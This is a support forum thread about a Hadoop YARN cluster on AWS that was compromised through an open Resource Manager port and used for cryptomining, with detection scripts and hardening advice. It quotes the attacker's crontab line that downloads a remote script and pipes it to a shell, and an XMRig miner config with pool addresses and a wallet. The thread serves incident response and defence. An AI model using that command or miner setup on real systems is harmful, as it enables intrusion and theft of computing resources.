Support Questions



We have an AWS cluster set up for HCP Metron, and we are seeing a very large number of application entries in the YARN Resource Manager UI. What could be the reason for so many application submission requests?

- Labels: Apache Hadoop, Apache YARN

Created on 08-03-2018 04:53 AM - edited 09-16-2022 06:32 AM

Created 08-03-2018 05:42 AM

This is not normal. It is a known security breach, and a security notification has been sent out about it.

Below is the crontab entry of the 'yarn' user on each host in the cluster, which spawns these jobs on the Resource Manager:

*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
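To look for this kind of entry across hosts, a minimal sketch is shown here. It assumes you have already dumped each user's crontab to text (for example with `crontab -l -u yarn`), and the function name and the regular expression are illustrative heuristics, not an official detection rule.

```python
import re

# Heuristic (an assumption, not an official signature): a downloader such as
# wget or curl whose output is piped straight into a shell.
DOWNLOAD_PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|]*\|\s*(sh|bash)\b")


def find_suspicious_cron_lines(crontab_text):
    """Return non-comment crontab lines that pipe a download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        # Skip blank lines and crontab comments.
        if not stripped or stripped.startswith("#"):
            continue
        if DOWNLOAD_PIPE_TO_SHELL.search(stripped):
            hits.append(stripped)
    return hits
```

Any line it reports still needs a manual review, since a legitimate job could match the same pattern.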

1. Stop further attacks:

a. Use firewall / iptables settings to allow access to the Resource Manager port (default 8088) only from whitelisted IP addresses. Do this on both Resource Managers in your HA setup. This only addresses the current attack. To permanently secure your clusters, all HDP endpoints (e.g., WebHDFS) must be blocked from open access from outside the firewall.

b. Make your cluster secure (kerberized).

2. Clean up existing attacks:

a. If you already see the above problem in your clusters, filter all applications named “MYYARN” and kill them after verifying that they were not legitimately submitted by your own users.

b. You will also need to log in to the cluster machines manually, check for any process involving “z_2.sh”, “/tmp/java”, or “/tmp/w.conf”, and kill it.
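The two cleanup checks above can be sketched as follows. This is only an illustration: the function names are hypothetical, the application payload is assumed to have the shape returned by the Resource Manager REST endpoint `/ws/v1/cluster/apps`, and the process text is assumed to be the output of a command such as `ps aux`.

```python
SUSPICIOUS_APP_NAME = "MYYARN"
PROCESS_INDICATORS = ("z_2.sh", "/tmp/java", "/tmp/w.conf")


def select_apps_by_name(apps_payload, name=SUSPICIOUS_APP_NAME):
    """Return (id, user, state) tuples for applications with the given name.

    apps_payload is the parsed JSON from /ws/v1/cluster/apps; the "apps"
    value can be null when the cluster has no applications.
    """
    apps = (apps_payload.get("apps") or {}).get("app") or []
    return [
        (app.get("id"), app.get("user"), app.get("state"))
        for app in apps
        if app.get("name") == name
    ]


def match_process_lines(ps_output, indicators=PROCESS_INDICATORS):
    """Return process-listing lines that contain any of the indicator strings."""
    return [
        line
        for line in ps_output.splitlines()
        if any(indicator in line for indicator in indicators)
    ]
```

Each application id returned can then be reviewed and, if it is not yours, killed with `yarn application -kill <application id>`. The indicator match is a plain substring test, so a path like `/var/tmp/java` is also caught by `/tmp/java`.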

Hortonworks strongly recommends that affected customers involve their internal security team to determine the extent of the damage and any lateral movement inside the network. Affected customers will need to do a clean, secure installation after taking a backup, and must ensure that the data is not contaminated.

Created 08-03-2018 07:09 AM

You need to secure your YARN. Dr. Who is the anonymous user. Require passwords, enable Kerberos, add Knox, and secure your servers.

http://hadoop.apache.org/docs/r2.8.0/hadoop-project-dist/hadoop-common/SecureMode.html

hadoop.http.staticuser.user = dr.who

It's an internal joke for the default user. You can change it. Seeing it means that you have not secured your Hadoop, that you have an easy password like admin, or that you have a malicious user.
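To see which static user a cluster is actually configured with, a small sketch like the following can read the property out of the contents of `core-site.xml`. The function name is hypothetical, and the fallback value `dr.who` is the default listed in `core-default.xml`.

```python
import xml.etree.ElementTree as ET

STATIC_USER_PROPERTY = "hadoop.http.staticuser.user"
DEFAULT_STATIC_USER = "dr.who"  # default from core-default.xml


def get_static_user(core_site_xml):
    """Return the configured static web user, or the default if it is unset."""
    root = ET.fromstring(core_site_xml)
    # Hadoop config files are a flat list of <property> elements.
    for prop in root.findall("property"):
        name = prop.findtext("name", default="").strip()
        if name == STATIC_USER_PROPERTY:
            return prop.findtext("value", default="").strip()
    return DEFAULT_STATIC_USER
```

If this returns `dr.who`, the property has either not been overridden or has been set to the default explicitly.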

https://hadoop.apache.org/docs/r2.4.1/hadoop-project-dist/hadoop-common/core-default.xml

https://www.bleepingcomputer.com/news/security/hadoop-servers-expose-over-5-petabytes-of-data/

Stop your cluster. Change your security settings, then restart. You can then kill all those jobs, and no new ones will start.

Created 08-03-2018 07:25 AM

Thank you @Sindhu and @Rakesh S. I did a root cause analysis and found that our server is hosted in AWS, which is a public cloud, and that we have not set up Kerberos or firewalls.

On the nodes I can find a process running with w.conf:

yarn 21775 353 0.0 470060 12772 ? Ssl Aug02 5591:25 /var/tmp/java -c /var/tmp/w.conf

Within /var/tmp I can see a config.json which contains:

{
    "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
    "av": 0, // algorithm variation, 0 auto select
    "background": true, // true to run the miner in the background
    "colors": true, // false to disable colored output
    "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1, // donate level, mininum 1%
    "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60, // print hashrate report every N seconds
    "retries": 5, // number of times to retry before switch to backup server
    "retry-pause": 5, // time to pause between retries
    "safe": false, // true to safe adjust threads and av settings for current CPU
    "threads": null, // number of miner threads
    "pools": [
        {
            "url": "158.69.133.20:3333", // URL of mining server
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
            "pass": "x", // password for mining server
            "keepalive": true, // send keepalived for prevent timeout (need pool support)
            "nicehash": false // enable nicehash/xmrig-proxy support
        },
        {
            "url": "192.99.142.249:3333", // URL of mining server
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
            "pass": "x", // password for mining server
            "keepalive": true, // send keepalived for prevent timeout (need pool support)
            "nicehash": false // enable nicehash/xmrig-proxy support
        },
        {
            "url": "202.144.193.110:3333", // URL of mining server
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
            "pass": "x", // password for mining server
            "keepalive": true, // send keepalived for prevent timeout (need pool support)
            "nicehash": false // enable nicehash/xmrig-proxy support
        }
    ],
    "api": {
        "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null, // access token for API
        "worker-id": null // custom worker-id for API
    }
}

which clearly shows that a mining attack has affected our system. Worst of all, all the files were created, and the processes were running, with root permissions.
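For anyone who finds a similar miner config and wants the pool addresses for firewall blocking or for the security team, here is a rough sketch that pulls them out. It assumes the file has one setting per line with trailing `//` comments, and the function names are hypothetical.

```python
import json


def strip_line_comments(text):
    """Remove // comments that appear outside JSON string literals."""
    cleaned = []
    for line in text.splitlines():
        in_string = False
        escaped = False
        cut = len(line)
        for i, ch in enumerate(line):
            if escaped:
                escaped = False  # character after a backslash is literal
            elif ch == "\\" and in_string:
                escaped = True
            elif ch == '"':
                in_string = not in_string
            elif ch == "/" and not in_string and line[i:i + 2] == "//":
                cut = i  # comment starts here; drop the rest of the line
                break
        cleaned.append(line[:cut])
    return "\n".join(cleaned)


def pool_endpoints(config_text):
    """Return the "url" value of every entry under "pools"."""
    config = json.loads(strip_line_comments(config_text))
    return [pool["url"] for pool in config.get("pools", [])]
```

The comment stripping is needed because the standard `json` module rejects `//` comments. Tracking whether the scanner is inside a string keeps a value such as a URL containing `//` intact.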

Even though I could not confirm the root cause, my guess is that an attacker got access to our unprotected, unrestricted port 8088 and identified that the cluster is not Kerberized. They then brute-forced our root password, logged in to our AWS cluster, and gained full access to it.

Conclusion:

1. Enable Kerberos, add Knox, and secure your servers.

2. Try to enable a VPC.

3. Refine the security groups to whitelist only the needed IPs and ports for HTTP and SSH.

4. Use strong passwords on public clouds.

5. Change the default static user in Hadoop.

Ambari > HDFS > Configurations > Custom core-site > Add Property

hadoop.http.staticuser.user=yarn
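After tightening the security groups, it is worth confirming from a machine outside the whitelist that the Resource Manager port no longer answers. A minimal sketch, assuming plain TCP reachability is a good enough signal; the function name and the host name in the usage note are placeholders.

```python
import socket


def is_port_reachable(host, port, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False
```

For example, `is_port_reachable("rm-host.example.com", 8088)` should return `False` when run from an address that is not whitelisted.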